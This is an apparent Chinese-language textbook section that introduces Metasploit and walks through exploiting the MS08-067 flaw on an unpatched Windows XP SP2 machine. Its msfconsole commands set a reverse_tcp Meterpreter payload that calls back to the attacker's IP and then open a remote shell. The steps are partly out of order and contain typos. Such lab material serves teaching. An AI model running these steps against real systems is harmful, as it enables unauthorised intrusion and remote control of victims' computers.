Metasploit渗透工具

1.4Metasploit渗透工具
1.4.1 Metasploit简介
Metasploit是一个号称“黑掉整个星球”、免费的渗透测试工具，通过它可以很容易获得、开发计算机软件的漏洞，并对计算机实施攻击。
Metasploit有免费版和商业版本，Metasploit Framework（MSF）是免费版。Metasploiter Framework 已成为一个研究高危漏洞的途径，他集成了各种平台上常见的溢出漏洞和流行的Shellcode，并且不断更新。最新版本的MSF包含了920多种流行的操作系统及应用软件的漏洞，以及250个Shellcode。

1.4.2Metasploit的使用
被攻击者是一台没有打过补丁的Windows XP SP2中文版的计算机，这个版本的系统存在MS08-067漏洞。
（1）启动Metasploit BackTrack 5 R3已经集成了Metasploit，在BackTrack5中打开一个终端，执行“msfconsole”命令，启动控制台。
Metasploit有各种各样的模块，所谓的模块是一段代码。模块又有很多种，典型的有攻击模块（exploit模块），就是用时机发起渗透的代码；也是有辅助模块（auxiliary模块），是执行扫描之类动作的模块。Metasploit还有攻击载荷（Payload），Payload是目标系统被渗透成功后执行的代码。一般是先使用攻击模块对目标系统进行攻击，攻击成功后执行Payload。

在控制台中，可以执行“help”命令查看全部命令帮助，执行“help search”命令则查看“search” 命令的帮助信息；使用“exit”则退出控制台，回到Linux终端下。在控制台下，使用“Tab”键能自动补全命令。

msf exploit(ms08_067_netapi)>sessions -i 1 //使用ID为1的会话
[*] Starting interaction with 1...
meterpreter> //回到了之前放到后台payload的会话
meterpreter>exit 关闭payload回话，回到模块模式
[*]Shutting down Meterpreter...
msf exploit（ms08_067_netapi）>
msf exploit（ms08_067_netapi）>exit //退出msf控制台
root@bt：~# //回到了Linux命令提示符

msf >use expoit/windows/smb/ms08_067_netapi //使用找到的模块
msf exploit（ms08_067_netapi）> //进入到模块模式，注意提示符的变化
msf expoit（ms08_067_netapi）>set PAYLOAD windows/meterpreter/reverse_tcp //设置所用的payload，渗透成功后以上的payload会从目标主机发起一个发弹连接

msf exploit（ms08_067_netapi）>show options //显示需要设置什么选项



//以下是攻击模块需要设置的选项名，如果request列为yes，则表示该选项是必须值
msf exploit（ms08_067_netapi）>set LHOST 192.168.1.105
LHOST=>192.168.1.105 //payload反弹后连接的IP，即攻击者的IP


msf exploit （ms08_067_netapi）>show targets //显示有哪些目标的类型

msf exploit（ms08_067_netapi）>set TARGET 17 //目标为Windows XP SP2中文版
TARGET =>17
msf exploit(ms08_067_netapi)>show options //把全部设置检查一下
msf exploit（ms08_067_netap

i）>exploit //开始攻击
meterpreter> help //可以查看该模式下的命令帮助
meterpreter>shell //进入目标系统的交互命令行shell
C:\WINDOWS\system32>^Z //按“Ctrl+z”键
Background channel 1？[y/N] //回答“y”，shell放到后台，频道为1
meterpreter> //回到了payload会话
meterpreter>background //把payload会话放到后台
msf exploit（ms08_067_netapi）> //回到模块模式
msf exploit（ms08_067_netapi）>sessions